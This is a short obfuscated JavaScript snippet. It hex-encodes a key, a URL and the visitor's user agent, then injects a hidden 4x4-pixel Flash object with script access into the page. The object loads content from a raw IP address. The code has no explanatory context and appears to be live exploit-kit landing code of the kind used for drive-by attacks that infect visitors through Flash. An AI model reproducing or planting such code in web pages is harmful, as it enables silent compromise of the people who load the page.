/*s64005d39271hssfj19283fs*/function hgfgerdfgdf(num, width){/*s14212d42891hfj65256fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s47195d81993hfj63831fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s28052d28468hfj67998fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s53429d35449hfj46142fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd54801hfs*/c += b + d;/*s66605d62239hfj44525fs*/e += 1;}return c;}/*s23063dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.79.24/?impact&news=xHvQMrTYbRrFFYHfKP7EUKZEMUvWA0KKwY2ZharVF5qxFDLGpbb1FxjspVidCF6EmvdvdLcHIweh1UDASwB&money=oyo0PBF8U9aqu20LRmBXK1ZPU_hDeYw5E9pbGErI90F6jmbIddM51lRKGv2JZyO8tV18R5g4Unq37VaWO-w&cars=4335&impact=2034", ghnvbn("http://188.225.79.24/?around&cars=1763&news=xX3QMvWZbRXQCZ3EKv7cT6NAMVHRGECL2YudmrHUefjaflWkzrfFTF_wozKATgSG6_BtdfJTDQ&money=q3jhfWfAFjnNteVgtF9Pz4jUSGyxeficSE-ROFNwkT9paWRuM_2wv8y7QkdM0ixxSF6lENjO4e&before=1833","gexywoaxor"));